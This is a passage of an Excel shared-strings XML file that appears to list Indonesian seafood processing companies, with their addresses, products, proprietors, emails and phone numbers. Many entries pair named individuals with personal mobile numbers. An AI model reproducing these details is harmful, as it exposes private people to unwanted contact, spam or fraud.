    <t>fennygoldenkey@gmail.com</t>
  </si>
  <si>
    <t>FENNY KONGUASA , 081</t>
  </si>
  <si>
    <t>PT. DARWIN KARINDO MANDIRI</t>
  </si>
  <si>
    <t>Komplek Union Industrial Park Blok I No.08, Kel. Tanjung Sengkuang, Kec. Batu Ampar, Kota Batam</t>
  </si>
  <si>
    <t>SUKANTO</t>
  </si>
  <si>
    <t>Tanjung Sengkuang</t>
  </si>
  <si>
    <t>kennedykenny99@gmail.com</t>
  </si>
  <si>
    <t>Andi, 08129588887</t>
  </si>
  <si>
    <t>PT. KARIMATA TIMUR</t>
  </si>
  <si>
    <t>Jl. A. Yani No.88 Km 34 RT 002 RW 002, Kel. Nusa Indah, Kec. Bati-Bati, Kabupaten Tanah Laut</t>
  </si>
  <si>
    <t>rony chia</t>
  </si>
  <si>
    <t>Bati-Bati</t>
  </si>
  <si>
    <t>Nusa Indah</t>
  </si>
  <si>
    <t>pt.karimat@gmail.com</t>
  </si>
  <si>
    <t>siti hindun/ 082251489379</t>
  </si>
  <si>
    <t>hairy tan</t>
  </si>
  <si>
    <t>PT. KARYA KENCANA SUMBER SARI</t>
  </si>
  <si>
    <t>Jl. Raya Sumorame No.39, Kel. Sumorame, Kec. Candi, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>-, Kering</t>
  </si>
  <si>
    <t>Kerupuk Sotong, Kerupuk Ikan, Kerupuk Udang</t>
  </si>
  <si>
    <t>Jimmy Wibisono</t>
  </si>
  <si>
    <t>Candi</t>
  </si>
  <si>
    <t>Sumorame</t>
  </si>
  <si>
    <t>karyakencana1948@gmail.com</t>
  </si>
  <si>
    <t>031-8921574, 031-8962331</t>
  </si>
  <si>
    <t>PT. INDO MANDIRI SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Salmon Beku, Trout Beku, Salmon Segar, Trout Segar, Kerang Beku, Kerang Segar, Cephalopoda Beku, Cephalopoda Segar, Kepiting Beku, Kepiting Segar</t>
  </si>
  <si>
    <t>IR. SIGIT TRIYOGO H.S</t>
  </si>
  <si>
    <t>imporbintara@gmail.com</t>
  </si>
  <si>
    <t>HASAN</t>
  </si>
  <si>
    <t>APRIYADI</t>
  </si>
  <si>
    <t>PT. GRAHAMAKMUR CIPTAPRATAMA</t>
  </si>
  <si>
    <t>Jl. Veteran Madya I No.1 RT 011 RW 003, Kel. Gending, Kec. Kebomas, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Saimi Saleh</t>
  </si>
  <si>
    <t>Gending</t>
  </si>
  <si>
    <t>dcrgmcpgresik@gmail.com</t>
  </si>
  <si>
    <t>Zulis Mufidah / +6285655041857</t>
  </si>
  <si>
    <t>Hengki Setia Adi</t>
  </si>
  <si>
    <t>PT. MULTI MINA REJEKI</t>
  </si>
  <si>
    <t>Jl. Dermaga Muara Angke No. 10, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Ikan Pelagis Segar, Fillet Ikan Segar</t>
  </si>
  <si>
    <t>WANTO ASNIM</t>
  </si>
  <si>
    <t>multiminarejeki1688@yahoo.com</t>
  </si>
  <si>
    <t>DANIEL &amp; 08131516777</t>
  </si>
  <si>
    <t>PT. STAR MARINDO</t>
  </si>
  <si>
    <t>Jl. Muara Baru, Kawasan PPS Nizam Zachman, Blok J No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>SUGITO WAHID</t>
  </si>
  <si>
    <t>id.stmjkt@gmail.com</t>
  </si>
  <si>
    <t>021-6621586</t>
  </si>
  <si>
    <t>DEDED FANDILLAH UTAMA / 081210366002</t>
  </si>
  <si>
    <t>PT. TOXINDO PRIMA</t>
  </si>
  <si>
    <t>Jl. Lingkar Timur No. 5, Kel. Tegalkamulyan, Kec. Cilacap Selatan, Kabupaten Cilacap</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Demersal Beku, Lobster Beku, Lobster Rebus Beku, Kerang Rebus Beku</t>
  </si>
  <si>
    <t>TOKUSUI CORPORATION</t>
  </si>
  <si>
    <t>Cilacap Selatan</t>
  </si>
  <si>
    <t>Tegalkamulyan</t>
  </si>
  <si>
    <t>mimin_tox@yahoo.co.id</t>
  </si>
  <si>
    <t>Acep 0812266082</t>
  </si>
  <si>
    <t>ACEP</t>
  </si>
  <si>
    <t>KOPERASI MUTIARA BUNDA PESISIR</t>
  </si>
  <si>
    <t>Jl. Sukajadi Gg Mesjid RT 004 RW 004, Kel. Raja Bejamu, Kec. Sinaboi, Kabupaten Rokan Hilir</t>
  </si>
  <si>
    <t>Lainnya, Beku, Segar, Kering</t>
  </si>
  <si>
    <t>Kerang Hidup, Ikan Demersal Segar, Daging Kerang Rebus Beku, Udang Segar, Ikan Asin Kering</t>
  </si>
  <si>
    <t>TIROIMA BR SINAGA</t>
  </si>
  <si>
    <t>Sinaboi</t>
  </si>
  <si>
    <t>Raja Bejamu</t>
  </si>
  <si>
    <t>mutiarabundapesisir@gmail.com</t>
  </si>
  <si>
    <t>TIROIMA BR SINAGA / 082384797371</t>
  </si>
  <si>
    <t>PT. JIREH COMMODITY</t>
  </si>
  <si>
    <t>Jl. Kima Raya 2 Komplek Kima Square Warehouse 2 Unit No.11,12,13, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Telur Ikan Terbang Kering, Telur Ikan Terbang Beku</t>
  </si>
  <si>
    <t>KANG SEONGGUK</t>
  </si>
  <si>
    <t>jckoin01@gmail.com</t>
  </si>
  <si>
    <t>0411 4723452</t>
  </si>
  <si>
    <t>MARISSA 082297460031</t>
  </si>
  <si>
    <t>PT. HOI HING INVESTMENT</t>
  </si>
  <si>
    <t>Jl. Raya Pakal No.71, Kel. Pakal, Kec. Pakal, Kota Surabaya</t>
  </si>
  <si>
    <t>Teripang Kering, Rumput Laut Kering</t>
  </si>
  <si>
    <t>CHAN FAI WAH</t>
  </si>
  <si>
    <t>Pakal</t>
  </si>
  <si>
    <t>hoihing_invest@yahoo.com</t>
  </si>
  <si>
    <t>031-7417771</t>
  </si>
  <si>
    <t>PT. TRIDAYA JAYA MANUNGGAL</t>
  </si>
  <si>
    <t>Jl. Rembang Industri Raya No. 36 PIER, Kel. Rembang, Kec. Rembang, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku, Tuna Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>Raditya Adhi Susanto</t>
  </si>
  <si>
    <t>tridayajm_qa@yahoo.com</t>
  </si>
  <si>
    <t>+ 62 - 343 - 740 339</t>
  </si>
  <si>
    <t>Bambang  / 081130331</t>
  </si>
  <si>
    <t>PT. PERIKANAN NUSANTARA (PERSERO) CABANG BITUNG</t>
  </si>
  <si>
    <t>Jl. Samuel Languyu, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Pelagis Beku, Tuna Segar, Tuna Beku</t>
  </si>
  <si>
    <t>Aertembaga Satu</t>
  </si>
  <si>
    <t>pnbitung@yahoo.com</t>
  </si>
  <si>
    <t>0438-21197</t>
  </si>
  <si>
    <t>Jukifli Wiku/081297371767</t>
  </si>
  <si>
    <t>Manjappai Daeng Bella</t>
  </si>
  <si>
    <t>PT. GALIC BINA MADA</t>
  </si>
  <si>
    <t>Jl. Inspeksi Kalimalang RT 002 RW 001, Kel. Sukadanau, Kec. Cikarang Barat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Tepung Karagenan, Refined Carrageenan</t>
  </si>
  <si>
    <t>SANDY RUSLI</t>
  </si>
  <si>
    <t>admin@galicbinamada.com</t>
  </si>
  <si>
    <t>021-8900850</t>
  </si>
  <si>
    <t>PT. SAMUDRA MANDIRI SENTOSA</t>
  </si>
  <si>
    <t>Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung</t>
  </si>
  <si>
    <t>Reduksi, Segar, Beku, Kaleng, Kering</t>
  </si>
  <si>
    <t>Tepung Ikan, Tuna Segar, Ikan Pelagis Segar, Ikan Pelagis Beku, Tuna Beku, Ikan Demersal Segar, Ikan Demersal Beku, Tuna Kaleng, Tuna Pouch, Ikan Asap Kering, Tuna Loin Masak Beku</t>
  </si>
  <si>
    <t>Eddy Julianto</t>
  </si>
  <si>
    <t>Wangurer</t>
  </si>
  <si>
    <t>qc_ptsms@yahoo.com</t>
  </si>
  <si>
    <t>0438-21888</t>
  </si>
  <si>
    <t>Sigit Saptono</t>
  </si>
  <si>
    <t>PT. JAGANNATHA ELANG PRATAMA</t>
  </si>
  <si>
    <t>Dusun Stasiun RT 01 RW 01, Kel. Sukomulyo, Kec. Pajarakan, Kabupaten Probolinggo</t>
  </si>
  <si>
    <t>Udang Rebus Beku, Udang Mentah Beku, Fillet Bandeng Beku</t>
  </si>
  <si>
    <t>Agung Prastowo</t>
  </si>
  <si>
    <t>Pajarakan</t>
  </si>
  <si>
    <t>Sukomulyo</t>
  </si>
  <si>
    <t>jagannathaelangpratama@gmail.com</t>
  </si>
  <si>
    <t>Agung Prastowo (081331576888)</t>
  </si>
  <si>
    <t>Tita Rosiana</t>
  </si>
  <si>
    <t>PERUM PERIKANAN INDONESIA CABANG BRONDONG</t>
  </si>
  <si>
    <t>Jl. Raya Brondong No. 16, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Kerang Beku, Udang Kipas Beku, Udang Beku, Tuna Beku, Tuna Loin Beku, Fillet Ikan Beku, Ikan Hasil Budidaya Beku, Tuna Loin Segar, Teri Beku</t>
  </si>
  <si>
    <t>Risyanto Suanda</t>
  </si>
  <si>
    <t>divperdagangan.perindo@gmail.com</t>
  </si>
  <si>
    <t>0322-661544</t>
  </si>
  <si>
    <t>Indra Aristyan, 082298439322</t>
  </si>
  <si>
    <t>Sigit Suhendi</t>
  </si>
  <si>
    <t>PT. PINGAN SEAFOOD PRODUCT MANUFACTURE</t>
  </si>
  <si>
    <t>Jl. Margomulyo 44, Komplek Pergudangan Suri Mulia Permai Blok B No.21, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya</t>
  </si>
  <si>
    <t>Teripang Kering, Perut Ikan Kering, Abalone Kering</t>
  </si>
  <si>
    <t>WEI XIANG PEI</t>
  </si>
  <si>
    <t>sandratirta12@gmail.com</t>
  </si>
  <si>
    <t>031-7484749</t>
  </si>
  <si>
    <t>SANDRA 085646778575</t>
  </si>
  <si>
    <t>SITI KHOTIMAH</t>
  </si>
  <si>
    <t>PT. KAWAL LAUT JAYA</t>
  </si>
  <si>
    <t>Jl. Wisata Bahari Km 31 RT 006 RW 002, Kel. Kawal, Kec. Gunung Kijang, Kabupaten Bintan</t>
  </si>
  <si>
    <t>Segar, Beku, Lainnya</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Ikan Demersal Beku, Ikan Demersal Segar, Fillet Ikan Beku, Fillet Ikan Segar, Lobster Hidup, Ikan Pelagis Beku, Ikan Pelagis Segar, Udang Segar</t>
  </si>
  <si>
    <t>PT.KAWAL LAUT JAYA</t>
  </si>
  <si>
    <t>Gunung Kijang</t>
  </si>
  <si>
    <t>Kawal</t>
  </si>
  <si>
    <t>pt.kawal.laut.jaya@gmail.com</t>
  </si>
  <si>
    <t>ENDY 082388309251</t>
  </si>
  <si>
    <t>ENDY</t>
  </si>
  <si>
    <t>PT. JAYA MITRA SAMUDERA</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Ruang Processing No.4 Dermaga Barat, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>HENDY</t>
  </si>
  <si>
    <t>jayamitrasamudera@gmail.com</t>
  </si>
  <si>
    <t>021 - 6617879</t>
  </si>
  <si>
    <t>AMSAR LUBIS</t>
  </si>
  <si>
    <t>PT. JEMBATAN LINTAS GLOBAL</t>
  </si>
  <si>
    <t>Jl. Hatni No.200A Km 60,8, Kel. Tlogosadang, Kec. Paciran, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Tuna Beku</t>
  </si>
  <si>
    <t>jlglamongan@gmail.com</t>
  </si>
  <si>
    <t>031-3942045</t>
  </si>
  <si>
    <t>CV. SEA HARVEST</t>
  </si>
  <si>
    <t>Komplek Pergudangan Bandara Benda Permai Blok E No.20 Jl. Raya Perancis No.688 RT 003 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Kerang Hidup, Keong Laut Hidup, Ikan Air Tawar Hidup, Kerapu Hidup, Lobster Hidup, Belut Hidup, Udang Ronggeng Hidup</t>
  </si>
  <si>
    <t>cvharvest20@gmail.com</t>
  </si>
  <si>
    <t>PT. PANCA MITRA MULTI PERDANA</t>
  </si>
  <si>
    <t>Jl. Raya Banyuwangi Km 10, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo</t>
  </si>
  <si>
    <t>riris.pmmp@gmail.com</t>
  </si>
  <si>
    <t>Suyud Kusrinto/0811352849</t>
  </si>
  <si>
    <t>PT. CASSANATAMA NATURINDO</t>
  </si>
  <si>
    <t>Jl. Banget Ayu RT 01 RW 05, Kel. Banget Ayu Kulon, Kec. Genuk, Kota Semarang</t>
  </si>
  <si>
    <t>Kerupuk Udang</t>
  </si>
  <si>
    <t>Chandrayanti</t>
  </si>
  <si>
    <t>Banget Ayu Kulon</t>
  </si>
  <si>
    <t>cassanatama@yahoo.com</t>
  </si>
  <si>
    <t>Chandrayanti 0811275727</t>
  </si>
  <si>
    <t>PT. TRI MITRA MAKMUR - PLANT 2</t>
  </si>
  <si>
    <t>Jl. Wonokoyo RT 02 RW 03, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo</t>
  </si>
  <si>
    <t>Hirawan TedjoKoesoemo</t>
  </si>
  <si>
    <t>qa.stb@trimitramakmur.com</t>
  </si>
  <si>
    <t>David Yoseph / 08113067807</t>
  </si>
  <si>
    <t>David Yoseph</t>
  </si>
  <si>
    <t>PT. ALVIA TRI MANDIRI</t>
  </si>
  <si>
    <t>Komp. Prima Centre Jl. Pool PPD Blok A No.1, Kel. Kedaung Kaliangke, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Refined Carrageenan</t>
  </si>
  <si>
    <t>Victor Alex Halomoan Marbun</t>
  </si>
  <si>
    <t>parla@alviatm.com</t>
  </si>
  <si>
    <t>021-54367399</t>
  </si>
  <si>
    <t>Martin Yudistiro &amp; 085692804900</t>
  </si>
  <si>
    <t>HARAPAN BUNDA</t>
  </si>
  <si>
    <t>Sumatera Barat</t>
  </si>
  <si>
    <t>Jorong Unggan Aro, Kel. Unggan, Kec. Sumpur Kudus, Kabupaten Sijunjung</t>
  </si>
  <si>
    <t>Stik Ikan, Rengginang Ikan</t>
  </si>
  <si>
    <t>Sumpur Kudus</t>
  </si>
  <si>
    <t>Unggan</t>
  </si>
  <si>
    <t>harapanbunda.unggan@gmail.com</t>
  </si>
  <si>
    <t>SITI IMYATIM &amp; 082170527878</t>
  </si>
  <si>
    <t>SITI IMYATIM</t>
  </si>
  <si>
    <t>PT. MALUKU PRIMA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Dr. Leimena No.8A, Kel. Tawiri, Kec. Teluk Ambon, Kota Ambon</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Loin Beku, Tuna Loin Segar, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Edy Suyatno</t>
  </si>
  <si>
    <t>Tawiri</t>
  </si>
  <si>
    <t>rama@kmlseafood.com</t>
  </si>
  <si>
    <t>0911-323805</t>
  </si>
  <si>
    <t>Lester Maringka</t>
  </si>
  <si>
    <t>PT. INDOJOY FORTUNA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok O Kav 3 &amp; 4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku, Ikan Pelagis Segar, Salmon Beku</t>
  </si>
  <si>
    <t>Surjandi</t>
  </si>
  <si>
    <t>indojoynurhp@gmail.com</t>
  </si>
  <si>
    <t>021-22671761</t>
  </si>
  <si>
    <t>Nur Hadipitoyo / 08161973227</t>
  </si>
  <si>
    <t>Nur Hadipitoyo</t>
  </si>
  <si>
    <t>UD. SONI</t>
  </si>
  <si>
    <t>Bengkulu</t>
  </si>
  <si>
    <t>Jl. TPI Pulau Baai RT 10 RW 02, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Soni Apriyanto</t>
  </si>
  <si>
    <t>Kampung Melayu</t>
  </si>
  <si>
    <t>Sumber Jaya</t>
  </si>
  <si>
    <t>soniskp3@gmail.com</t>
  </si>
  <si>
    <t>Soni Apriyanto/085267775467</t>
  </si>
  <si>
    <t>PT. KARYA DOUBLE DELAPAN</t>
  </si>
  <si>
    <t>Jl. Bypass Ngurah Rai Gang Mina Utama No.10, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Tuna Segar, Ikan Demersal Segar, Tuna Beku</t>
  </si>
  <si>
    <t>ARIFIN</t>
  </si>
  <si>
    <t>arifin.ud88@gmail.com</t>
  </si>
  <si>
    <t>0361 725560</t>
  </si>
  <si>
    <t>ARIFIN &amp; 08224788905</t>
  </si>
  <si>
    <t>CV. PASIFIC HARVEST</t>
  </si>
  <si>
    <t>Jl. Tratas No.61, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Tuna Kaleng, Tuna Loin Masak Beku, Tuna Pouch</t>
  </si>
  <si>
    <t>AMINOTO</t>
  </si>
  <si>
    <t>qcpasificharvest@gmail.com</t>
  </si>
  <si>
    <t>0333-593368</t>
  </si>
  <si>
    <t>JOHAN 085232434485</t>
  </si>
  <si>
    <t>PT. TRANS ANUGRAH MULIA</t>
  </si>
  <si>
    <t>Pattene Bussines Park Blok U3 B, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>David Gani</t>
  </si>
  <si>
    <t>Temmapaduae</t>
  </si>
  <si>
    <t>sujadipakpahan7@gmail.com</t>
  </si>
  <si>
    <t>David Gani &amp; 081354535314</t>
  </si>
  <si>
    <t>PT. BAHARI MAKMUR SEJATI</t>
  </si>
  <si>
    <t>Kawasan Industri Modern Cikande, Jl. Utama Modern Industri AA No.1, Kel. Barengkok, Kec. Kibin, Kabupaten Serang</t>
  </si>
  <si>
    <t>Kibin</t>
  </si>
  <si>
    <t>Barengkok</t>
  </si>
  <si>
    <t>qcpaper@bmsfood.com</t>
  </si>
  <si>
    <t>0254-8480861</t>
  </si>
  <si>
    <t>Agatha Ariany 081375357474</t>
  </si>
  <si>
    <t>Henry Hidayat</t>
  </si>
  <si>
    <t>PT. MAKMUR BERJAYA INDO CHINA</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Komp. Pergudangan 75 Blok K No.4, Kel. Benda, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Kepiting Hidup, Kerapu Hidup, Lobster Hidup, Keong Hidup, Udang Ronggeng Hidup</t>
  </si>
  <si>
    <t>NG KI LUN</t>
  </si>
  <si>
    <t>mutu.ptmbic@gmail.com</t>
  </si>
  <si>
    <t>CALVIN : 082112393111 / AHMAD ALI : 082218770582</t>
  </si>
  <si>
    <t>Calvin</t>
  </si>
  <si>
    <t>PT. HARTA SAMUDRA</t>
  </si>
  <si>
    <t>Desa Waplau, Kec. Waplau, Kabupaten Buru</t>
  </si>
  <si>
    <t>Tuna Loin Beku</t>
  </si>
  <si>
    <t>ROBERT TJOANDA</t>
  </si>
  <si>
    <t>Waplau</t>
  </si>
  <si>
    <t>doc.controller@hartasamudra.net</t>
  </si>
  <si>
    <t>OEI ENG SAN/081248539862</t>
  </si>
  <si>
    <t>OEI ENG SAN</t>
  </si>
  <si>
    <t>PT. DAN LAUT INDONESIA</t>
  </si>
  <si>
    <t>Jl. Kayu Besar Blok K No.4 RT 004 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Hiu Kering Asin, Ikan Asin Kering, Teripang Beku, Teripang Kering</t>
  </si>
  <si>
    <t>K HARDIONO</t>
  </si>
  <si>
    <t>danlautindonesia01@gmail.com</t>
  </si>
  <si>
    <t>Duta Herdiansyah ( 081283656495 )</t>
  </si>
  <si>
    <t>PT. KASIH PRIMA</t>
  </si>
  <si>
    <t>Jl. Raya Wonoayu No.26, Kel. Gempol, Kec. Gempol, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Chitin, Chitosan</t>
  </si>
  <si>
    <t>Iwan Agus</t>
  </si>
  <si>
    <t>nitakotik@yahoo.co.id</t>
  </si>
  <si>
    <t>0343-850131</t>
  </si>
  <si>
    <t xml:space="preserve">Komari </t>
  </si>
  <si>
    <t>Komari</t>
  </si>
  <si>
    <t>PT. SINAR PURE FOODS INTERNATIONAL</t>
  </si>
  <si>
    <t>Signal Marine Venture</t>
  </si>
  <si>
    <t>ivonne.peleh@ptsinarpurefoods.com</t>
  </si>
  <si>
    <t>Ivonne Peleh - 081340605942</t>
  </si>
  <si>
    <t>Samuel C. Calamba, Jr.</t>
  </si>
  <si>
    <t xml:space="preserve">RIZWAN EFFENDI </t>
  </si>
  <si>
    <t>Kampung Bahari RT 12 RW 03, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>H.Rizwan Effendi</t>
  </si>
  <si>
    <t>llbskp@yahoo.com</t>
  </si>
  <si>
    <t>0736-53789</t>
  </si>
  <si>
    <t>H.Rizwan Effendi/082377254033</t>
  </si>
  <si>
    <t>H. Rizwan Effendi</t>
  </si>
  <si>
    <t>PERUSAHAAN UMUM PERIKANAN INDONESIA UNIT NATUNA</t>
  </si>
  <si>
    <t>Kantor Perusahaan Umum Perikanan Indonesia Unit Natuna, Pelabuhan Perikanan Selat Lampa, Kel. Sabang Mawang Balai, Kec. Pulau Tiga, Kabupaten Natuna</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Fillet Ikan Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>FATAH SETIAWAN TOPOBROTO</t>
  </si>
  <si>
    <t>Pulau Tiga</t>
  </si>
  <si>
    <t>Sabang Mawang Balai</t>
  </si>
  <si>
    <t>ppun.natuna@yahoo.com</t>
  </si>
  <si>
    <t>IID APRISAL &amp; 082289861998</t>
  </si>
  <si>
    <t>IID APRISAL</t>
  </si>
  <si>
    <t>UD. SINAR MAS</t>
  </si>
  <si>
    <t>Jl. Vand Iskandar Baksir No.17, Kel. Jitra, Kec. Teluk Segara, Kota Bengkulu</t>
  </si>
  <si>
    <t>Hok Tong</t>
  </si>
  <si>
    <t>Teluk Segara</t>
  </si>
  <si>
    <t>Jitra</t>
  </si>
  <si>
    <t>sinarmasoke@yahoo.com</t>
  </si>
  <si>
    <t>Hok Tong/085268817777</t>
  </si>
  <si>
    <t>PT. LAUTAN SEJAHTERA MANDIRI</t>
  </si>
  <si>
    <t>Pulau Bulang RT 005 RW 002, Kel. Batu Legong, Kec. Bulang, Kota Batam</t>
  </si>
  <si>
    <t>Udang Segar</t>
  </si>
  <si>
    <t>Bulang</t>
  </si>
  <si>
    <t>Batu Legong</t>
  </si>
  <si>
    <t>lautansejahteramandiri_pt@yahoo.co.id</t>
  </si>
  <si>
    <t>DEL MUKHLIS 081277575984</t>
  </si>
  <si>
    <t>TJATUR ISNANDAR</t>
  </si>
  <si>
    <t>PT. BLUE OCEAN GRACE INTERNATIONAL</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>Nabsar Badoa, S.PI, M.Si</t>
  </si>
  <si>
    <t>hettymanutur@yahoo.co.id</t>
  </si>
  <si>
    <t>0438-31889</t>
  </si>
  <si>
    <t>Hetty Manutur</t>
  </si>
  <si>
    <t>CV. HADI WIJAYA ABADI</t>
  </si>
  <si>
    <t>Jl. Datuk Laksamana Gg. Mawar No.02, Kel. Dumai Kota, Kec. Dumai Kota, Kota Dumai</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Udang Segar</t>
  </si>
  <si>
    <t>warsiati</t>
  </si>
  <si>
    <t>Dumai Kota</t>
  </si>
  <si>
    <t>hadiwijayaabadi@gmail.com</t>
  </si>
  <si>
    <t>Warsiati 085265338112</t>
  </si>
  <si>
    <t>PT. GRAHA INSAN SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok O Kav 1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>IR. SUSANTO</t>
  </si>
  <si>
    <t>laboratory@grahais.com</t>
  </si>
  <si>
    <t>021-6613573</t>
  </si>
  <si>
    <t>MUH. AZIZ ASYHARI (0818834459)</t>
  </si>
  <si>
    <t>PT. BAHARI MULIA UTAMA</t>
  </si>
  <si>
    <t>Kawasan Industri Candi, Jl. Gatot Subroto Blok F6, Kel. Purwoyoso, Kec. Ngaliyan, Kota Semarang</t>
  </si>
  <si>
    <t>MIRA DEWANTI</t>
  </si>
  <si>
    <t>Ngaliyan</t>
  </si>
  <si>
    <t>Purwoyoso</t>
  </si>
  <si>
    <t>bmu.seafoodindusty@gmail.com</t>
  </si>
  <si>
    <t>024-76433770</t>
  </si>
  <si>
    <t>SURYANI - 085865063631</t>
  </si>
  <si>
    <t>BIMO BHASKORO</t>
  </si>
  <si>
    <t>PT. MEGAH WAHANA MAKMUR</t>
  </si>
  <si>
    <t>Pelabuhan Muara Baru Ujung Jl. Tuna 1 Blok K4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Beku, Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Alexander Gunarso</t>
  </si>
  <si>
    <t>megahwahanamakmur@outlook.com</t>
  </si>
  <si>
    <t>Alexander Gunarso, 087882888186</t>
  </si>
  <si>
    <t>CV. SARI MUTIARA ABADI</t>
  </si>
  <si>
    <t>Dusun Krajan RT 02 RW 04, Kel. Srigading, Kec. Lawang, Kabupaten Malang</t>
  </si>
  <si>
    <t>Rumput Laut Kering, Tepung Agar-agar</t>
  </si>
  <si>
    <t>Christianto Immannuel</t>
  </si>
  <si>
    <t>Lawang</t>
  </si>
  <si>
    <t>Srigading</t>
  </si>
  <si>
    <t>sari.mutiara.abadi@gmail.com</t>
  </si>
  <si>
    <t>0341-423071</t>
  </si>
  <si>
    <t xml:space="preserve"> Milka Ari Gustini 081334699072</t>
  </si>
  <si>
    <t>Wiji Lestari</t>
  </si>
  <si>
    <t>LERISKA</t>
  </si>
  <si>
    <t>Korong Pasa Gelombang Nagari Kayu Tanam, Kel. Kayu Tanam, Kec. 2x11 Kayu Tanam, Kabupaten Padang Pariaman</t>
  </si>
  <si>
    <t>Asap, Beku, Kering, Lainnya</t>
  </si>
  <si>
    <t>Lele Asap, Produk Perikanan Bernilai Tambah Beku, Stik Ikan, Rendang Salai Lele</t>
  </si>
  <si>
    <t>2x11 Kayu Tanam</t>
  </si>
  <si>
    <t>Kayu Tanam</t>
  </si>
  <si>
    <t>leriskaok@gmail.com</t>
  </si>
  <si>
    <t>Lili Suryani &amp; 081218972099</t>
  </si>
  <si>
    <t>Lili Suryani</t>
  </si>
  <si>
    <t>CV. MARVELL JAYA FISHERY</t>
  </si>
  <si>
    <t>Jl. Dermaga Baru No.8 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Udang Segar, Tuna Segar</t>
  </si>
  <si>
    <t>Hartono</t>
  </si>
  <si>
    <t>cvmarveljaya2018@gmail.com</t>
  </si>
  <si>
    <t>021-22666624</t>
  </si>
  <si>
    <t>CV. PASTI LANCAR</t>
  </si>
  <si>
    <t>RT 005 RW 001, Kel. Magersari, Kec. Rembang, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Ikan Kering, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>TARWI</t>
  </si>
  <si>
    <t>Magersari</t>
  </si>
  <si>
    <t>cv.pasti.lancar1@gmail.com</t>
  </si>
  <si>
    <t>TARWI 082138869449</t>
  </si>
  <si>
    <t>SORYONO</t>
  </si>
  <si>
    <t>PT. AVILA PRIMA INTRA MAKMUR</t>
  </si>
  <si>
